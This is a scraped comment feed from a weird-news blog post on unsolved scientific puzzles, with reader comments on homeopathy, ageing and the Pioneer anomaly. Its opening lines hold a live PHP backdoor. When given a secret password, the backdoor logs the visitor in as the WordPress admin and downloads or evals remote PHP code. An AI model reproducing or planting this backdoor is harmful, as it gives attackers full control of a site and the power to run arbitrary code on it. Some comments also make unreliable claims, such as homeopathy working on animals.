if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'aab3238922bcc25a6f606eb525ffdc56'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
Comments on: 13 Unsolved scientific puzzles
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/
Weird News, Weird Stuff, Wtf PicturesWed, 13 Oct 2010 13:34:24 +0000hourly1http://wordpress.org/?v=3.0.3By: Chronos
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/comment-page-1/#comment-1324
ChronosThu, 27 Aug 2009 18:20:48 +0000http://wtf.thebizzare.com/?p=1174#comment-1324@davidhc3 Homeopathy works on animals. At least on dogs.@davidhc3 Homeopathy works on animals. At least on dogs.
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By: davidhc3
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/comment-page-1/#comment-1318
davidhc3Wed, 26 Aug 2009 04:46:08 +0000http://wtf.thebizzare.com/?p=1174#comment-1318i think homeopathy works beacuse the placebo effect. u believe in somebody who said it will work, so it worksi think homeopathy works beacuse the placebo effect. u believe in somebody who said it will work, so it works
]]>By: charles
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/comment-page-1/#comment-1258
charlesThu, 30 Jul 2009 00:06:31 +0000http://wtf.thebizzare.com/?p=1174#comment-1258The idea of why we die is not an absolute mystery but it is curious phenomena. Senesence (aging) the gradual process of system decline and eventual death has several reasonable theories that each have some supporting observation and experimental evidence. The most supported idea is that the separation of gametes (sperm and eggs) causes an organism to expend limited energy to maintaining somatic tissue (non-sex mass) to optimize mating after reproductive maturity the somatic material starts to age(senescene = less repairs). Asexual organisms maintain immune/somatic investment during their life span in contast of sexual organisms, sex (conjoining of different gamete types)= meiosis (ploidy-level reduction cell division) + syngamy (gamete fusion).It may be because energy invested early means less opportunity to maintain somatic tissue later or it could be negative gene association. Likewise, early investment in survival mechanisms tapers off to maximize reproductive ability for a period and then the effect of early investment can never be regained, like compound investment to your back account. For example, there is a study on rats where the researchers ignored a line of rats bred to have high cancer rates because they were not developing tumors until they noticed they aged 3 times quicker than the other lines that developed tumors, suggesting an energy or an epistatic trade-off between immunity and senescence. There is another supported theory that aging occurs because selection is unable to affect life history patterns after reproductive age because the selective pressures are so weak compared to pre-reproductive reproductive pressure.
One could compare the issue to the variation in plants and animals that reproduce in one growing season(invest large energy in reproduction at the expense of maintaining somatic tissue) and die compared to a redwood that lives a very long time and invests proportionally little in reproductive effort.
This is another reason why sex may be maintained rather than the efficiency of asexual reproduction.
A very interesting question is why is there only 2 sexes?
Oh by the way the missing mass in the universe is either a bad math calculation or we just don't know how to quantify something.The idea of why we die is not an absolute mystery but it is curious phenomena. Senesence (aging) the gradual process of system decline and eventual death has several reasonable theories that each have some supporting observation and experimental evidence. The most supported idea is that the separation of gametes (sperm and eggs) causes an organism to expend limited energy to maintaining somatic tissue (non-sex mass) to optimize mating after reproductive maturity the somatic material starts to age(senescene = less repairs). Asexual organisms maintain immune/somatic investment during their life span in contast of sexual organisms, sex (conjoining of different gamete types)= meiosis (ploidy-level reduction cell division) + syngamy (gamete fusion).It may be because energy invested early means less opportunity to maintain somatic tissue later or it could be negative gene association. Likewise, early investment in survival mechanisms tapers off to maximize reproductive ability for a period and then the effect of early investment can never be regained, like compound investment to your back account. For example, there is a study on rats where the researchers ignored a line of rats bred to have high cancer rates because they were not developing tumors until they noticed they aged 3 times quicker than the other lines that developed tumors, suggesting an energy or an epistatic trade-off between immunity and senescence. There is another supported theory that aging occurs because selection is unable to affect life history patterns after reproductive age because the selective pressures are so weak compared to pre-reproductive reproductive pressure.
One could compare the issue to the variation in plants and animals that reproduce in one growing season(invest large energy in reproduction at the expense of maintaining somatic tissue) and die compared to a redwood that lives a very long time and invests proportionally little in reproductive effort.
This is another reason why sex may be maintained rather than the efficiency of asexual reproduction.
A very interesting question is why is there only 2 sexes?
Oh by the way the missing mass in the universe is either a bad math calculation or we just don’t know how to quantify something.
]]>By: Winston
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/comment-page-1/#comment-1237
WinstonFri, 17 Jul 2009 03:08:06 +0000http://wtf.thebizzare.com/?p=1174#comment-1237To puzzle number 2; the moon moves in space, the earth moves in space, the sun moves in space. As a whole everything is moving relatively all together; in a different direction than the Pioneers. Imagine playing pool with the table constantly moving. the balls will basically go in the direction being shot with a little inertia (friction) causing it to drift off course.To puzzle number 2; the moon moves in space, the earth moves in space, the sun moves in space. As a whole everything is moving relatively all together; in a different direction than the Pioneers. Imagine playing pool with the table constantly moving. the balls will basically go in the direction being shot with a little inertia (friction) causing it to drift off course.
]]>By: Even in real life, there are bonus stages… - Xaotik Designs
http://wtf.thebizzare.com/offbeat/science-and-technology/13-unsolved-scientific-puzzles/comment-page-1/#comment-1142
Even in real life, there are bonus stages… - Xaotik DesignsSat, 13 Jun 2009 15:28:15 +0000http://wtf.thebizzare.com/?p=1174#comment-1142[...] unresolved scientific [...][...] unresolved scientific [...]
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